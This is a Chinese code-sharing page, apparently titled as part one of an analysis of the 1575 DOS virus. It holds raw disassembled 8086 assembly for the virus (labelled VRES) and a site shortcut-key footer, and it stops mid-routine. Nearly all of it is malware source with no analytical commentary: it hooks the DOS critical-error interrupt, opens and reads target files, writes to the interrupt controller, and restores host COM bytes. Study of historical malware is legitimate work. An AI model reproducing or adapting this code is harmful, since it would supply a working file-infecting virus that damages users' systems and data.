📄 1575病毒源程序分析(1) .txt
字号:
PAGE 60,132
;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
;圹 圹
;圹 VRES 圹
;圹 圹
;圹 Created: 4-Jan-92 圹
;圹 Passes: 5 Analysis Flags on: H 圹
;圹 圹
;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
data_1e equ 12Bh
data_2e equ 137h
data_3e equ 139h
data_4e equ 13Bh
data_5e equ 27Dh
data_6e equ 5CDh
data_7e equ 724h
data_8e equ 6B0h
data_9e equ 3
data_10e equ 12h
seg_a segment
assume cs:seg_a, ds:seg_a
org 100h
vres proc far
start:
push cs
mov ax,cs
data_11 dw 105h
data_12 dw 5000h
data_13 dw 0B8h
data_14 dw 5001h
db 0CBh, 0
data_15 dw 0
data_16 dw 0EB00h
db 4Ah, 90h
data_17 dw 1460h
db 74h, 2, 53h, 0FFh
data_18 dw 0F000h
data_19 dw 3B8h
db 0, 0CDh
data_20 dw 0CD10h
data_21 dw 20h
data_22 dw 20h
data_23 dw 11h
data_24 dw 0FFFFh
data_25 dw 4
data_26 dw 100h
data_27 dw 674Fh
data_28 dw 100h
data_29 dw 4
data_30 dw 0
data_31 dw 0
data_32 dw 0
data_33 dw 340h
data_34 db 5
db 0, 8Ah, 43h, 0B7h, 9Ah, 14h
db 0, 0, 1, 71h, 0Dh, 8Eh
db 0Ch, 56h, 5, 1, 0EAh, 56h
db 74h, 2, 5Ch, 7, 70h, 0
loc_1:
push ss
add al,al
or bx,[si+7]
jo loc_2 ; Jump if overflow=1
loc_2:
push es
push ds
mov ax,es
push cs
pop ds
push cs
pop es
mov data_31,ax
mov ax,ss
mov data_26,ax
mov al,2
out 20h,al ; port 20h, 8259-1 int command
cld ; Clear direction
xor ax,ax ; Zero register
mov ds,ax
xor si,si ; Zero register
mov di,13Ch
mov cx,10h
repne movsb ; Rep while cx>0 Mov [si] to es:[di]
push ds
pop ss
mov bp,8
xchg bp,sp
call sub_1 ; (01D5)
jmp loc_24 ; (0552)
loc_3:
call sub_12 ; (05EC)
call sub_2 ; (023D)
jz loc_4 ; Jump if zero
mov al,ds:data_7e
push ax
call sub_3 ; (02AE)
pop ax
mov ds:data_7e,al
jmp short loc_5 ; (01B4)
db 90h
loc_4:
call sub_5 ; (041B)
call sub_6 ; (043D)
cmp byte ptr ds:data_7e,0
jne loc_5 ; Jump if not equal
mov ax,4C00h
int 21h ; DOS Services ah=function 4Ch
; terminate with al=return code
loc_5:
cmp byte ptr ds:data_7e,43h ; 'C'
jne loc_8 ; Jump if not equal
loc_6:
pop ds
pop es
push cs
pop ds
pop es
push es
mov di,100h
mov si,10Bh
mov cx,0Ch
repne movsb ; Rep while cx>0 Mov [si] to es:[di]
push es
pop ds
mov ax,100h
push ax
xor ax,ax ; Zero register
retf ; Return far
vres endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_1 proc near
mov si,6
lodsw ; String [si] to ax
cmp ax,192h
je loc_6 ; Jump if equal
cmp ax,179h
jne loc_7 ; Jump if not equal
jmp loc_10 ; (028F)
loc_7:
cmp ax,1DCh
je loc_8 ; Jump if equal
retn
loc_8:
pop ds
pop es
mov bx,cs:data_18
sub bx,cs:data_29
mov ax,cs
sub ax,bx
mov ss,ax
mov bp,cs:data_30
xchg bp,sp
mov bx,cs:data_21
sub bx,cs:data_22
mov ax,cs
sub ax,bx
push ax
mov ax,cs:data_23
push ax
retf ; Return far
db 23h, 1Ah
db '<#/--!.$'
db 0Eh, 23h, 2Fh, 2Dh, 0E0h
db 'D:VRES.COM'
db 0, 58h, 45h, 0, 0
db 24h, 24h, 24h, 24h, 24h
;哌哌 External Entry into Subroutine 哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
sub_2:
mov ax,3D02h
mov dx,219h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jnc loc_9 ; Jump if carry=0
clc ; Clear carry flag
retn
loc_9:
mov ds:data_1e,ax
mov dx,673h
mov ax,2524h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
mov ax,4202h
mov bx,ds:data_1e
mov cx,0FFFFh
mov dx,0FFFEh
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov dx,27Dh
mov ah,3Fh ; '?'
mov bx,ds:data_1e
mov cx,2
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push ds
mov dx,ds:data_3e
mov ax,ds:data_2e
mov ds,ax
mov ax,2524h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
pop ds
cmp word ptr ds:data_5e,0A0Ch
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -